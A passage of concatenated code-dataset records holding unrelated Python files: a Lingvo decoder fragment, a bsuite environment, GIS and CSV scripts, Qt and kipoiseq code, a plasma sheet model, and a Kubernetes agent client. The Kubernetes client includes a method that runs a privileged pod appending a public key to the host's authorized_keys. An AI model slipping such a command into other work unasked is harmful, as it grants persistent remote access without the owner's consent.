TileForBeamAndFlatten(tf.gather(weights, time_step, axis=1))\n if p.bias_only_if_consistent:\n weight = weight * tf.cast(consistent, py_utils.FPropDtype(p))\n\n # convert from dense label to sparse label probs\n vocab_size = tf.shape(bs_results.log_probs)[1]\n uncertainty = tf.constant(1e-10, py_utils.FPropDtype(\n p)) # avoid 0 probs which may cause issues with log\n label_probs = tf.one_hot(\n label,\n vocab_size,\n on_value=1 - uncertainty,\n off_value=uncertainty /\n tf.cast(vocab_size - 1, py_utils.FPropDtype(p)),\n dtype=py_utils.FPropDtype(p)) # [tgt_batch, vocab_size]\n pred_probs = tf.exp(bs_results.log_probs)\n\n # interpolate predicted probs and label probs\n weight = tf.expand_dims(weight, 1)\n probs = py_utils.with_dependencies([\n py_utils.assert_less_equal(weight, 1.),\n py_utils.assert_greater_equal(weight, 0.)\n ], (1.0 - weight) * pred_probs + weight * label_probs)\n return tf.math.log(probs), consistent\n\n def NoApplyBias():\n \"\"\"No-op. Return original log_probs and consistent.\"\"\"\n return bs_results.log_probs, states.consistent\n\n log_probs, consistent = tf.cond(\n tf.reduce_all(tf.equal(weights, 0.0)), NoApplyBias, ApplyBias)\n bs_results.log_probs = log_probs\n out_states.consistent = consistent\n\n return bs_results, out_states\n\n return self.beam_search.BeamSearchDecode(self.theta, encoder_outputs,\n num_hyps_per_beam_override,\n InitBeamSearchStateCallback,\n PreBeamSearchStepCallback,\n self._PostBeamSearchStepCallback)\n\n def InferenceAdditionalEncoder(self, feeds):\n \"\"\"Generate an inference graph for the additional encoder.\"\"\"\n return py_utils.NestedMap(), py_utils.NestedMap()\n","sub_path":"lingvo/core/base_decoder.py","file_name":"base_decoder.py","file_ext":"py","file_size_in_byte":16355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"175207271","text":"# pylint: disable=g-bad-file-header\n# Copyright 2019 DeepMind Technologies Limited. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"Simple diagnostic memory challenge.\n\nObservation is given by n+1 pixels: (context, time_to_live).\n\nContext will only be nonzero in the first step, when it will be +1 or -1 iid\nby component. All actions take no effect until time_to_live=0, then the agent\nmust repeat the observations that it saw bit-by-bit.\n\"\"\"\n\nfrom typing import Optional\n\nfrom bsuite.environments import memory_chain\nfrom bsuite.experiments.memory_size import sweep\n\n\ndef load(num_bits: int, seed: Optional[int] = 0):\n \"\"\"Memory Chain environment, with variable number of bits.\"\"\"\n env = memory_chain.MemoryChain(\n memory_length=2,\n num_bits=num_bits,\n seed=seed,\n )\n env.bsuite_num_episodes = sweep.NUM_EPISODES\n return env\n\n","sub_path":"bsuite/experiments/memory_size/memory_size.py","file_name":"memory_size.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"224979973","text":"import arcpy\n\nfc = arcpy.GetParameterAsText(0)\ntopo = arcpy.GetParameterAsText(1)\nsearch_radius = arcpy.GetParameterAsText(2)\n\narcpy.env.workspace = \"IN_MEMORY\"\n\narcpy.env.overwriteOutput = True\n\npoints = arcpy.ExportTopologyErrors_management(topo,\"\", \"topo\")[0]\n\nlyr = arcpy.MakeFeatureLayer_management(points,\"lyr\")\n\nexpression = \"{0} = 'Must Not Have Dangles'\".format(arcpy.AddFieldDelimiters(lyr, \"RuleDescription\"))\n\narcpy.SelectLayerByAttribute_management(lyr,\"NEW_SELECTION\",expression)\n\narcpy.Near_analysis(lyr,lyr,search_radius)\n\nexpression2 = \"{0} > 0\".format(arcpy.AddFieldDelimiters(lyr, \"NEAR_DIST\"))\n\narcpy.SelectLayerByAttribute_management(lyr,\"NEW_SELECTION\",expression2)\n\narcpy.CopyFeatures_management(lyr,fc)","sub_path":"ArcGIS/find_gaps.py","file_name":"find_gaps.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"539353994","text":"from os import listdir\nfrom os.path import isfile, join, splitext\nfrom random import shuffle \nimport csv\n\n\nmain_path = '/home/gpds/Documents/AutoEncoderVideo/src'\nwith open('UnB-AVQ-2018-Experiment1.csv','r') as f:\n\treader= csv.reader(f)\n\tlist = list(reader)\n\tlist = list[1:]\n\tamnt_rows = len(list)\n\tamnt_training = int(amnt_rows * 0.8)\n\tamnt_testing = amnt_rows - amnt_training\n\tshuffle(list)\n\nwith open('Experiment1_train.csv','w', newline='') as train_file:\n\tfields_names =['refFile', 'testFile', 'Mqs', 'Mcs', 'HRC', 'videoDegradationType', 'videoCodec', 'videoBitrate', 'packetLossRate','freezingPauses', 'freezingLength'];\n\ttrain_w = csv.writer(train_file, delimiter=';')\n\ttrain_w.writerow(fields_names)\n\tfor i in range(amnt_training):\n\t\ttrain_w.writerow(list[i])\n\nwith open('Experiment1_test.csv','w', newline='') as test_file:\n\tfields_names =['refFile', 'testFile', 'Mqs', 'Mcs', 'HRC', 'videoDegradationType', 'videoCodec', 'videoBitrate', 'packetLossRate','freezingPauses', 'freezingLength'];\n\ttest_w = csv.writer(test_file, delimiter=';')\n\ttest_w.writerow(fields_names)\n\tfor i in range(amnt_training, amnt_rows):\n\t\ttest_w.writerow(list[i])\n","sub_path":"src/csvsplit.py","file_name":"csvsplit.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"393445346","text":"# Copyright (C) 2023 The Qt Company Ltd.\n# SPDX-License-Identifier: LicenseRef-Qt-Commercial OR BSD-3-Clause\n\nfrom PySide6.QtCore import Slot\nfrom PySide6.QtGraphs import QBarDataProxy, QBarDataItem\n\n\nclass VariantBarDataProxy(QBarDataProxy):\n\n def __init__(self):\n super().__init__()\n self._dataSet = None\n self._mapping = None\n\n def setDataSet(self, newSet):\n if self._dataSet:\n self._dataSet.itemsAdded.disconnect(self.handleItemsAdded)\n self._dataSet.dataCleared.disconnect(self.handleDataCleared)\n\n self._dataSet = newSet\n\n if self._dataSet:\n self._dataSet.itemsAdded.connect(self.handleItemsAdded)\n self._dataSet.dataCleared.connect(self.handleDataCleared)\n self.resolveDataSet()\n\n def dataSet(self):\n return self._dataSet.data()\n\n # Map key (row, column, value) to value index in data item (VariantItem).\n # Doesn't gain ownership of mapping, but does connect to it to listen for\n # mapping changes. Modifying mapping that is set to proxy will trigger\n # dataset re-resolving.\n def setMapping(self, mapping):\n if self._mapping:\n self._mapping.mappingChanged.disconnect(self.handleMappingChanged)\n\n self._mapping = mapping\n\n if self._mapping:\n self._mapping.mappingChanged.connect(self.handleMappingChanged)\n\n self.resolveDataSet()\n\n def mapping(self):\n return self._mapping.data()\n\n @Slot(int, int)\n def handleItemsAdded(self, index, count):\n # Resolve new items\n self.resolveDataSet()\n\n @Slot()\n def handleDataCleared(self):\n # Data cleared, reset array\n self.resetArray(None)\n\n @Slot()\n def handleMappingChanged(self):\n self.resolveDataSet()\n\n # Resolve entire dataset into QBarDataArray.\n def resolveDataSet(self):\n # If we have no data or mapping, or the categories are not defined,\n # simply clear the array\n if (not self._dataSet or not self._mapping\n or not self._mapping.rowCategories()\n or not self._mapping.columnCategories()):\n self.resetArray()\n return\n\n itemList = self._dataSet.itemList()\n\n rowIndex = self._mapping.rowIndex()\n columnIndex = self._mapping.columnIndex()\n valueIndex = self._mapping.valueIndex()\n rowList = self._mapping.rowCategories()\n columnList = self._mapping.columnCategories()\n\n # Sort values into rows and columns\n itemValueMap = {}\n for item in itemList:\n key = str(item[rowIndex])\n v = itemValueMap.get(key)\n if not v:\n v = {}\n itemValueMap[key] = v\n v[str(item[columnIndex])] = float(item[valueIndex])\n\n # Create a new data array in format the parent class understands\n newProxyArray = []\n for rowKey in rowList:\n newProxyRow = []\n for i in range(0, len(columnList)):\n item = QBarDataItem(itemValueMap[rowKey][columnList[i]])\n newProxyRow.append(item)\n newProxyArray.append(newProxyRow)\n\n # Finally, reset the data array in the parent class\n self.resetArray(newProxyArray)\n","sub_path":"examples/graphs/widgetgallery/variantbardataproxy.py","file_name":"variantbardataproxy.py","file_ext":"py","file_size_in_byte":3263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"74543866","text":"import pytest\nfrom pytest_mock import mocker\nimport pandas as pd\nfrom kipoiseq.transforms.functional import translate, rc_dna\nfrom kipoiseq.dataclasses import Interval, Variant\nfrom kipoiseq.extractors.protein import cut_transcript_seq, gtf_row2interval, \\\n CDSFetcher, TranscriptSeqExtractor, ProteinSeqExtractor, \\\n ProteinVCFSeqExtractor, SingleSeqProteinVCFSeqExtractor, \\\n SingleVariantProteinVCFSeqExtractor\n\ngtf_file = 'tests/data/sample_1_protein.gtf'\nfasta_file = 'tests/data/demo_dna_seq.fa'\ntranscript_id = 'enst_test1'\nvcf_file = 'tests/data/singleVar_vcf_enst_test2.vcf.gz'\n\n\nintervals = [\n Interval('22', 580, 596, strand='+', attrs={'tag': 'cds_end_NF'}),\n Interval('22', 597, 610, strand='+', attrs={'tag': 'cds_end_NF'})\n]\n\n\ndef test_cut_seq():\n seq = 'ATCGATG'\n seq = cut_transcript_seq(seq, 'cds_end_NF')\n assert len(seq) == 6\n\n seq = 'ATCGATG'\n seq = cut_transcript_seq(seq, 'cds_end_NF,cds_start_NF')\n assert len(seq) == 3\n\n seq = 'ATCGATG'\n seq = cut_transcript_seq(seq, 'cds_start_NF')\n assert len(seq) == 9\n\n seq = 'ATCGATG'\n seq = cut_transcript_seq(seq, 'no_tag')\n assert len(seq) == 3\n\n\ndef test_gtf_row2interval():\n row = pd.Series({\n 'Chromosome': '22',\n 'Start': 10,\n 'End': 20,\n 'Strand': '-',\n 'tag': 'cds_end_NF'\n })\n expected_interval = Interval(chrom='22', start=10,\n end=20, name='', strand='-', attrs={'tag': 'cds_end_NF'})\n\n assert gtf_row2interval(row) == expected_interval\n\n\ndef test_CDSFetcher__read_cds():\n cds = CDSFetcher._read_cds(gtf_file, duplicate_attr=True)\n assert cds.shape[0] == 7\n\n assert cds.iloc[0].Chromosome == '22'\n assert cds.iloc[0].Start == 598\n assert cds.iloc[0].End == 3050\n\n assert cds.iloc[3].Start == 3\n assert cds.iloc[3].End == 300\n\n\n@pytest.fixture\ndef cds_fetcher():\n return CDSFetcher(gtf_file)\n\n\ndef test_CDSFetcher__len__(cds_fetcher):\n assert len(cds_fetcher) == 3\n\n\ndef test_CDSFetcher_get_cds(cds_fetcher):\n intervals = cds_fetcher.get_cds(transcript_id)\n intervals[0] == Interval(chrom='22', start=598,\n end=3196, name='', strand='+')\n # TODO: Improve testcase with adding transcript with 2 cds\n\n\n@pytest.fixture\ndef transcript_seq_extractor():\n return TranscriptSeqExtractor(gtf_file, fasta_file)\n\n\ndef test_get_protein_seq(transcript_seq_extractor):\n transcript_id = 'enst_test2'\n seq = transcript_seq_extractor.get_protein_seq(transcript_id)\n txt_file = 'tests/data/Output_singleSeq_vcf_enst_test2.txt'\n expected_seq = open(txt_file).readline()\n assert seq[1:] == expected_seq[1:] # no expected mutation here\n\n\ndef test_TranscriptSeqExtractor_prepare_seq():\n seqs = ['ATCGATG']\n assert 'ATCGAT' == TranscriptSeqExtractor._prepare_seq(\n seqs, '+', 'cds_end_NF')\n assert 'CATCGA' == TranscriptSeqExtractor._prepare_seq(\n seqs, '-', 'cds_end_NF')\n\n\ndef test_TranscriptSeqExtractor_get_seq(transcript_seq_extractor):\n seq = transcript_seq_extractor.get_seq(transcript_id)\n assert len(seq) == 3196 - 598\n\n\ndef test_TranscriptSeqExtractor_get_item(transcript_seq_extractor):\n assert transcript_seq_extractor[0] == transcript_seq_extractor.get_seq(\n transcript_id)\n\n\n@pytest.fixture\ndef protein_seq_extractor():\n return ProteinSeqExtractor(gtf_file, fasta_file)\n\n\ndef test_ProteinSeqExtractor_prepare_seq(protein_seq_extractor):\n seqs = ['ATCGATG']\n\n pro_seq = protein_seq_extractor._prepare_seq(seqs, '+', 'cds_end_NF')\n assert pro_seq == 'ID'\n\n pro_seq = protein_seq_extractor._prepare_seq(seqs, '-', 'cds_end_NF')\n assert pro_seq == 'HR'\n\n\ndef test_ProteinVCFSeqExtractor__unstrand():\n unstrand_intervals = ProteinVCFSeqExtractor._unstrand(intervals)\n assert all(i.strand == '.' for i in unstrand_intervals)\n\n# TODO: write test for with sample_id\n\n\n@pytest.fixture\ndef protein_vcf_seq(mocker):\n extractor = ProteinVCFSeqExtractor(gtf_file, fasta_file, vcf_file)\n extractor.extract_query = mocker.MagicMock(\n return_value=iter((['ATC', 'GATG'], ['CATC', 'GAT'])))\n return extractor\n\n\ndef test_ProteinVCFSeqExtractor_extract_cds(protein_vcf_seq):\n protein_seqs = list(protein_vcf_seq.extract_cds(intervals))\n\n assert protein_seqs[0] == 'ID'\n assert protein_seqs[1] == 'HR'\n\n query = list(protein_vcf_seq.extract_query\n .call_args[0][0].variant_intervals)\n\n variants = list(query[0][0])\n assert len(variants) == 1\n assert variants[0].pos == 596\n interval = query[0][1]\n assert interval.start == 580\n\n variants = list(query[1][0])\n\n assert len(variants) == 1\n assert variants[0].pos == 598\n interval = query[1][1]\n assert interval.start == 597\n\n\ndef test_ProteinVCFSeqExtractor_extract(protein_vcf_seq):\n transcript_id = 'enst_test2'\n protein_seqs = list(protein_vcf_seq.extract(transcript_id))\n assert protein_seqs[0] == 'HR'\n assert protein_seqs[1] == 'ID'\n\n\n@pytest.fixture\ndef single_seq_protein():\n vcf_file = 'tests/data/singleVar_vcf_enst_test2.vcf.gz'\n return SingleSeqProteinVCFSeqExtractor(gtf_file, fasta_file, vcf_file)\n\n\ndef test_SingleSeqProteinVCFSeqExtractor_extract(single_seq_protein, transcript_seq_extractor):\n transcript_id = 'enst_test2'\n seq = single_seq_protein.extract(transcript_id)\n txt_file = 'tests/data/Output_singleSeq_vcf_enst_test2.txt'\n expected_seq = open(txt_file).readline()\n assert seq == expected_seq\n\n vcf_file = 'tests/data/singleVar_vcf_enst_test1_diff_type_of_variants.vcf.gz'\n transcript_id = 'enst_test1'\n single_seq_protein = SingleSeqProteinVCFSeqExtractor(\n gtf_file, fasta_file, vcf_file)\n\n seq = single_seq_protein.extract(transcript_id)\n ref_seq = transcript_seq_extractor.get_protein_seq(transcript_id)\n\n assert len(seq) == len(ref_seq)\n count = diff_between_two_seq(seq, ref_seq)\n assert count == 1, 'Expected diff of 1 AA, but it was: '+str(count)\n\n vcf_file = 'tests/data/singleSeq_vcf_enst_test2.vcf.gz'\n single_seq_protein = SingleSeqProteinVCFSeqExtractor(\n gtf_file, fasta_file, vcf_file)\n seq = list(single_seq_protein.extract_all())\n assert len(seq) == 0\n \n \n\n\n@pytest.fixture\ndef single_variant_seq():\n vcf_file = 'tests/data/singleVar_vcf_enst_test2.vcf.gz'\n return SingleVariantProteinVCFSeqExtractor(gtf_file, fasta_file, vcf_file)\n\n\ndef diff_between_two_seq(seq1, seq2):\n count = 0\n for i in range(len(seq1)):\n if seq1[i] != seq2[i]:\n count += 1\n return count\n\n\ndef test_SingleVariantProteinVCFSeqExtractor_extract(single_variant_seq, transcript_seq_extractor):\n transcript_id = 'enst_test2'\n seqs = list(single_variant_seq.extract(transcript_id))\n txt_file = 'tests/data/Output_singleVar_vcf_enst_test2.txt'\n expected_seq = open(txt_file).read().splitlines()\n assert seqs[0] == expected_seq[0]\n assert seqs[1] == expected_seq[1]\n assert seqs[2] == expected_seq[2]\n\n seqs = list(single_variant_seq.extract_all())\n counter = 0\n for tr_id, t_id_seqs in seqs:\n t_id_seqs = list(t_id_seqs)\n counter += len(t_id_seqs)\n for i, seq in enumerate(t_id_seqs):\n assert seq == expected_seq[i]\n assert tr_id == 'enst_test2'\n assert counter == 3, 'Number of variants in vcf 3, but # of seq was: ' + \\\n str(counter)\n \n transcript_id = ['enst_test2', 'enst_test1']\n seqs = single_variant_seq.extract_list(transcript_id)\n for tr_id, t_id_seqs in seqs:\n assert tr_id in ['enst_test2', 'enst_test1'], tr_id\n \n \n vcf_file = 'tests/data/singleVar_vcf_enst_test1_diff_type_of_variants.vcf.gz'\n transcript_id = 'enst_test1'\n single_var_protein = SingleVariantProteinVCFSeqExtractor(\n gtf_file, fasta_file, vcf_file)\n\n seqs = list(single_var_protein.extract(transcript_id))\n ref_seq = transcript_seq_extractor.get_protein_seq(transcript_id)\n\n assert len(seqs) == 1\n for seq in seqs:\n assert len(seq) == len(ref_seq)\n count = diff_between_two_seq(seq, ref_seq)\n assert count == 1, 'Expected diff of 1 AA, but it was: '+str(count)\n\n vcf_file = 'tests/data/singleSeq_vcf_enst_test2.vcf.gz'\n single_var_protein = SingleVariantProteinVCFSeqExtractor(\n gtf_file, fasta_file, vcf_file)\n length = 0\n seqs = list(single_var_protein.extract_all())\n for t_id in seqs:\n length = len(list(t_id))\n assert length == 0\n\n# TODO: add for all proteins.pep.all.fa\n","sub_path":"tests/extractors/test_protein.py","file_name":"test_protein.py","file_ext":"py","file_size_in_byte":8516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"561970812","text":"\"\"\"\nThis file contains an object-oriented implementation of the Tsyganenko-Mukai\nplasma sheet model. This model is based off of a statistical analysis of\nmeasurements from the GEOTAIL spacecraft. See description in source paper for\nmore information.\n\nReferences:\n\nTsyganenko, N. A., and T. Mukai (2003), Tail plasma sheet models derived from Geotail\nparticle data, J. Geophys. Res., 108, 1136, doi:10.1029/2002JA009707, A3\n\n\"\"\"\n\nimport numpy as np\n\nclass plasma_sheet(object):\n\n __aT=np.array([ 0.0000, 1.6780,-0.1606, 1.6690, 4.8200, 2.8550,-0.6020,-0.8360,\n -2.4910, 0.2568, 0.2249, 0.1887,-0.4458,-0.0331,-0.0241,-2.6890,\n 1.2220])\n __aN=np.array([ 0.0000,-0.1590, 0.6080, 0.5055, 0.0796, 0.2746, 0.0361,-0.0342,\n -0.7935, 1.1620, 0.4756, 0.7117])\n __aP=np.array([ 0.0000, 0.0570, 0.5240, 0.0908, 0.5270, 0.0780,-4.4220,-1.5330,\n -1.2170, 2.5400, 0.3200, 0.7540, 1.0480,-0.0740, 1.0150])\n\n __bnorm = 5.0\n __vnorm = 500.0\n __nnorm = 10.0\n __rnorm = 10.0\n __pnorm = 3.0\n __dtor = np.pi/180.0\n __rtod = 180.0/np.pi\n\n def __init__(self,bperp=__bnorm,theta=90.0,vx=__vnorm,n=__nnorm,p=__pnorm):\n\n self.bperp = bperp/self.__bnorm\n self.theta = theta\n self.vsw = vx/self.__vnorm\n self.nsw = n/self.__nnorm\n self.psw = p/self.__pnorm\n self.bz = self.bperp*np.cos(self.__dtor*theta)\n\n if(self.bz > 0.0):\n self.bzs = 0.0\n self.bzn = self.bz\n else:\n self.bzn = 0.0\n self.bzs = -self.bz\n\n self.fsw = self.bperp*np.sqrt(np.sin(0.5*theta*self.__dtor))\n\n return\n\n def set_parameters(self,bperp=None,theta=None,vx=None,n=None,p=None):\n\n if not bperp is None:\n self.bperp = bperp/self.__bnorm\n\n if not theta is None:\n self.theta = theta\n\n if not vx is None:\n self.vsw = vx/self.__vnorm\n\n if not n is None:\n self.nsw = n/self.__nnorm\n\n if not p is None:\n self.psw = p/self.__pnorm\n\n if (not bperp is None) or (not theta is None):\n self.bz = self.bperp*np.cos(self.__dtor*self.theta)\n if self.bz > 0.0:\n self.bzs = 0.0\n self.bzn = self.bz\n else:\n self.bzs = -self.bz\n self.bzn = 0.0\n self.fsw = self.bperp*np.sqrt(np.sin(0.5*theta*self.__dtor))\n\n return\n\n def get_pressure(self,x,y):\n rho = np.sqrt(x*x+y*y)/self.__rnorm\n rm1 = rho-1.0\n phi = np.arctan2(y,x)\n\n P = (self.__aP[1]*rho**self.__aP[6]+\n self.__aP[2]*rho**self.__aP[7]*self.psw**self.__aP[11]+\n self.__aP[3]*rho**self.__aP[8]*self.fsw**self.__aP[12]+\n np.sin(phi)**2*\n (\n self.__aP[4]*self.psw**self.__aP[13]*np.exp(-self.__aP[9]*rho)+\n self.__aP[5]*self.fsw**self.__aP[14]*np.exp(-self.__aP[1]*rho)\n )\n )\n\n return P\n\n def get_density(self,x,y):\n rho = np.sqrt(x*x+y*y)/self.__rnorm\n rm1 = rho-1.0\n phi = np.arctan2(y,x)\n\n N = (rho**self.__aN[8]*\n (\n self.__aN[1]+\n self.__aN[2]*self.nsw**self.__aN[10]+\n self.__aN[3]*self.bzn+\n self.__aN[4]*self.vsw*self.bzs\n )+\n rho**self.__aN[9]*np.sin(phi)**2*\n (\n self.__aN[5]*self.nsw**self.__aN[11]+\n self.__aN[6]*self.bzn+\n self.__aN[7]*self.vsw*self.bzs\n )\n )\n\n return N\n\n\n def get_temperature(self,x,y):\n rho = np.sqrt(x*x+y*y)/self.__rnorm\n rm1 = rho-1.0\n phi = np.arctan2(y,x)\n\n T = (self.__aT[1]*self.vsw+self.__aT[2]*self.bzn+self.__aT[3]*self.bzs+\n self.__aT[4]*np.exp(-rm1*\n (\n self.__aT[9]*self.vsw**self.__aT[15]+\n self.__aT[10]*self.bzn+\n self.__aT[11]*self.bzs\n ))+\n np.sin(phi)**2*\n (\n self.__aT[5]*self.vsw+\n self.__aT[6]*self.bzn+\n self.__aT[7]*self.bzs+\n self.__aT[8]*np.exp(-rm1*\n (\n self.__aT[12]*self.vsw**self.__aT[16]+\n self.__aT[13]*self.bzn+\n self.__aT[14]*self.bzs\n )\n ))\n )\n\n return T\n\n def calculate_moments(self,x,y):\n\n T = self.get_temperature(x,y)\n N = self.get_density(x,y)\n P = self.get_pressure(x,y)\n\n self.T = T\n self.N = N\n self.P = P\n\n self.moments = {'N':self.N,'P':self.P,'T':self.T}\n\n return self.moments\n\nif __name__ == \"__main__\":\n\n import matplotlib.pyplot as pl\n\n xwant = np.linspace(-8,-48,41)\n ywant = np.linspace(-5,5,51)\n\n pmat = np.zeros([xwant.size,ywant.size])\n nmat = np.zeros_like(pmat)\n tmat = np.zeros_like(pmat)\n\n tm03 = plasma_sheet()\n tm03.set_parameters(vx=600,p=8.0)\n\n for i,x in enumerate(xwant):\n for j,y in enumerate(ywant):\n res=tm03.calculate_moments(x,y)\n pmat[i,j] = res['P']\n nmat[i,j] = res['N']\n tmat[i,j] = res['T']\n\n ax1 = pl.subplot2grid((3,1),(0,0))\n ax2 = pl.subplot2grid((3,1),(1,0))\n ax3 = pl.subplot2grid((3,1),(2,0))\n\n cp1=ax1.contourf(-xwant,ywant,(pmat.T),30,cmap=pl.get_cmap('nipy_spectral'))\n pl.colorbar(cp1,ax=ax1)\n cp2=ax2.contourf(-xwant,ywant,(nmat.T),30,cmap=pl.get_cmap('nipy_spectral'))\n pl.colorbar(cp2,ax=ax2)\n cp3=ax3.contourf(-xwant,ywant,(tmat.T),30,cmap=pl.get_cmap('nipy_spectral'))\n pl.colorbar(cp3,ax=ax3)\n\n pl.tight_layout()\n\n pl.show()","sub_path":"ptm_python/plasma_sheet.py","file_name":"plasma_sheet.py","file_ext":"py","file_size_in_byte":5827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"11778500","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 19 15:11:55 2017\n\n@author: User\n\"\"\"\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport statsmodels.formula.api as smf\n\ndata = pd.read_csv('timeseries_manuf_nototals.csv')\ndata.head()\n\ncleaned_data = data[(data['GVA'] > data['COE'])]\n\nneeded_data = cleaned_data[['DATE', 'WAGESHARE', 'MANUFACTURING']]\n\nnonservice_data = needed_data[(needed_data['MANUFACTURING'] == 0)]\nservice_data = needed_data[(needed_data['MANUFACTURING'] == 1)]\n\nprint('Wage shares in non-manuf. industries, whole timeseries:')\nprint(nonservice_data.describe())\n\nprint('Wage shares in manuf. industries, whole timeseries:')\nprint(service_data.describe())\n\nyearlist = []\n\nfor y in range(1997, 2015):\n yeardata = needed_data[(needed_data['DATE'] == y)]\n nonservice_data = yeardata[(yeardata['MANUFACTURING'] == 0)]\n n_yearsharedata = nonservice_data[['WAGESHARE']]\n service_data = yeardata[(yeardata['MANUFACTURING'] == 1)]\n yearsharedata = service_data[['WAGESHARE']]\n yearlist.append((y, n_yearsharedata.describe(), yearsharedata.describe()))\n \nfor y in yearlist:\n print(y[0], \":\")\n print('Non-manuf. industries:')\n print(y[1])\n print('Manuf. industries:')\n print(y[2])","sub_path":"wageshare_summary_cleaned_manuf.py","file_name":"wageshare_summary_cleaned_manuf.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"423034767","text":"import logging\nimport os\n\nfrom kubernetes import client, config\n\nfrom agent.orchestrator import ContainerRuntimeClient, ORCHESTRATOR_COE\n\n\nclass KubernetesClient(ContainerRuntimeClient):\n \"\"\"\n Kubernetes client\n \"\"\"\n\n def __init__(self, host_rootfs, host_home):\n super().__init__(host_rootfs, host_home)\n self.CLIENT_NAME: str = 'Kubernetes'\n config.load_incluster_config()\n self.client = client.CoreV1Api()\n self.client_apps = client.AppsV1Api()\n self.namespace = os.getenv('MY_NAMESPACE', 'nuvlabox')\n self.job_engine_lite_image = os.getenv('NUVLABOX_JOB_ENGINE_LITE_IMAGE')\n self.host_node_ip = os.getenv('MY_HOST_NODE_IP')\n self.host_node_name = os.getenv('MY_HOST_NODE_NAME')\n self.vpn_client_component = os.getenv('NUVLABOX_VPN_COMPONENT_NAME', 'vpn-client')\n self.infra_service_endpoint_keyname = 'kubernetes-endpoint'\n self.join_token_manager_keyname = 'kubernetes-token-manager'\n self.join_token_worker_keyname = 'kubernetes-token-worker'\n self.data_gateway_name = f\"data-gateway.{self.namespace}\"\n\n def get_node_info(self):\n if self.host_node_name:\n this_node = self.client.read_node(self.host_node_name)\n try:\n return this_node\n except AttributeError:\n logging.warning(f'Cannot infer node information for node \"{self.host_node_name}\"')\n\n return None\n\n def get_host_os(self):\n node = self.get_node_info()\n if node:\n return f\"{node.status.node_info.os_image} {node.status.node_info.kernel_version}\"\n\n return None\n\n def get_join_tokens(self) -> tuple:\n # NOTE: I don't think we can get the cluster join token from the API\n # it needs to come from the cluster mgmt tool (i.e. k0s, k3s, kubeadm, etc.)\n return ()\n\n def list_nodes(self, optional_filter={}):\n return self.client.list_node().items\n\n def get_cluster_info(self, default_cluster_name=None):\n node_info = self.get_node_info()\n\n cluster_id = self.get_cluster_id(node_info, default_cluster_name)\n\n nodes = self.list_nodes()\n managers = []\n workers = []\n for n in nodes:\n workers.append(n.metadata.name)\n for label in n.metadata.labels:\n if 'node-role' in label and 'master' in label:\n workers.pop()\n managers.append(n.metadata.name)\n break\n\n return {\n 'cluster-id': cluster_id,\n 'cluster-orchestrator': ORCHESTRATOR_COE,\n 'cluster-managers': managers,\n 'cluster-workers': workers\n }\n\n def get_api_ip_port(self):\n all_endpoints = self.client.list_endpoints_for_all_namespaces().items\n\n ip_port = None\n if self.host_node_ip:\n return self.host_node_ip, 6443\n\n try:\n endpoint = list(filter(lambda x: x.metadata.name.lower() == 'kubernetes', all_endpoints))[0]\n except IndexError:\n logging.error('There are no \"kubernetes\" endpoints where to get the API IP and port from')\n return None, None\n\n for subset in endpoint.subsets:\n for addr in subset.addresses:\n if addr.ip:\n self.host_node_ip = addr.ip\n break\n\n for port in subset.ports:\n if f'{port.name}/{port.protocol}' == 'https/TCP':\n ip_port = port.port\n break\n\n if self.host_node_ip and ip_port:\n return self.host_node_ip, ip_port\n\n return None, None\n\n def has_pull_job_capability(self):\n if self.job_engine_lite_image:\n return True\n else:\n return False\n\n def get_node_labels(self):\n node = self.get_node_info()\n node_labels = node.metadata.labels\n\n return self.cast_dict_to_list(node_labels)\n\n def is_vpn_client_running(self):\n vpn_pod = self.client.list_pod_for_all_namespaces(label_selector=f\"component={self.vpn_client_component}\").items\n\n if len(vpn_pod) < 1:\n return False\n\n for res in vpn_pod:\n for container in res.status.container_statuses:\n if container.name == self.vpn_client_component and container.ready:\n return True\n\n return False\n\n def install_ssh_key(self, ssh_pub_key, ssh_folder):\n name = 'nuvlabox-ssh-installer'\n try:\n existing_pod = self.client.read_namespaced_pod(namespace=self.namespace, name=name)\n except client.exceptions.ApiException as e:\n if e.status != 404: # If 404, this is good, we can proceed\n raise\n else:\n if existing_pod.status.phase.lower() not in ['succeeded', 'running']:\n logging.warning(f'Found old {name} with state {existing_pod.status.phase}. Trying to relaunch it...')\n self.client.delete_namespaced_pod(namespace=self.namespace, name=name)\n else:\n logging.info(f'SSH key installer \"{name}\" has already been launched in the past. Skipping this step')\n return False\n\n cmd = [\"sh\", \"-c\", \"echo -e \\\"${SSH_PUB}\\\" >> %s\" % f'{ssh_folder}/authorized_keys']\n volume_name = f'{name}-volume'\n pod_body = client.V1Pod(\n kind='Pod',\n metadata=client.V1ObjectMeta(name=name),\n spec=client.V1PodSpec(\n node_name=self.host_node_name,\n volumes=[\n client.V1Volume(\n name=volume_name,\n host_path=client.V1HostPathVolumeSource(\n path=f'{self.host_home}/.ssh'\n )\n )\n ],\n restart_policy='Never',\n containers=[\n client.V1Container(\n name=name,\n image='alpine',\n env=[\n client.V1EnvVar(\n name='SSH_PUB',\n value=ssh_pub_key\n )\n ],\n volume_mounts=[\n client.V1VolumeMount(\n 